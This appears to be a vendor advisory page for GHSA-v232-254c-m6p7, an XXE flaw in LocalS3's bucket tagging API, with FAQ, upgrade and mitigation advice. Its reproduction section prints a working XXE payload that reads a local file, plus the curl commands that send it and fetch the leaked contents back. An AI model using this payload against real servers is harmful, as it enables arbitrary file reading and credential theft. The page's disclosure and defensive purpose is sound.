How severe is GHSA-v232-254c-m6p7?

No CVSS score has been assigned to GHSA-v232-254c-m6p7 yet. Review the advisory details and affected package list to assess your exposure.

Which packages are affected by GHSA-v232-254c-m6p7?

GHSA-v232-254c-m6p7 affects the following packages: io.github.robothy:local-s3-rest (Maven). Ecosystems affected: Maven.

How do I fix GHSA-v232-254c-m6p7?

Update io.github.robothy:local-s3-rest to 1.21 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-v232-254c-m6p7 is resolved across your whole dependency graph.

How do I detect GHSA-v232-254c-m6p7 in my Maven dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for io.github.robothy:local-s3-rest. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-v232-254c-m6p7 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-v232-254c-m6p7?

O3 pinpoints whether GHSA-v232-254c-m6p7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-v232-254c-m6p7 actively exploited in the wild?

No public exploit code has been indexed for GHSA-v232-254c-m6p7 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-v232-254c-m6p7 published, and has it been updated?

GHSA-v232-254c-m6p7 was published on March 10, 2025 and was last updated on March 10, 2025. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

☕ Maven

GHSA-v232-254c-m6p7

LocalS3 Project Vulnerable to XML External Entity (XXE) Injection via Bucket Tagging API

Published

Mar 10, 2025

Updated

Mar 10, 2025

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

☕io.github.robothy:local-s3-rest

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Maven packages — download data is not available via public APIs for these ecosystems.

Description

The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.

When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.

The vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.

Steps to Reproduce

Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)

Send a PUT request to the bucket tagging endpoint with the following XML payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
    <!ENTITY xxe SYSTEM "file:///flag.txt" >
]>
<Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>

curl -X PUT \
     -H "Host: app" \
     -H "Authorization: AWS dummy:dummy" \
     -H "Content-Type: application/xml" \
     --data-binary @xxe.xml \
     http://app/bucket?tagging

Retrieve the bucket tags using a GET request to the same endpoint

curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?tagging

The content of the targeted file will be returned in the tag value

The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.

Mitigations

Disable XML external entity resolution in the XML parser configuration
Implement proper XML parsing security controls such as disabling DTD processing altogether
Use a safe parser configuration that doesn't process external entities or DTDs by default
Validate and sanitize all XML input before processing to prevent injection of malicious entities

Impact

Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
☕Maven	`io.github.robothy:local-s3-rest`	all versions	1.21

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for io.github.robothy:local-s3-rest. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update io.github.robothy:local-s3-rest to 1.21 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-v232-254c-m6p7 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-v232-254c-m6p7 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-v232-254c-m6p7. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Description The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution. When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files. The vulnerability is particularly sev

O3 Security · Impact-Aware SCA

Is GHSA-v232-254c-m6p7 in your dependencies?

O3 detects GHSA-v232-254c-m6p7 across Maven dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works

GHSA-v232-254c-m6p7

Blast Radius

Description

Description

Steps to Reproduce

Mitigations

Impact

Affected Packages

Detection & mitigation playbook

Detect

Fix

Workarounds

How O3 protects you

Frequently Asked Questions

Is GHSA-v232-254c-m6p7 in your dependencies?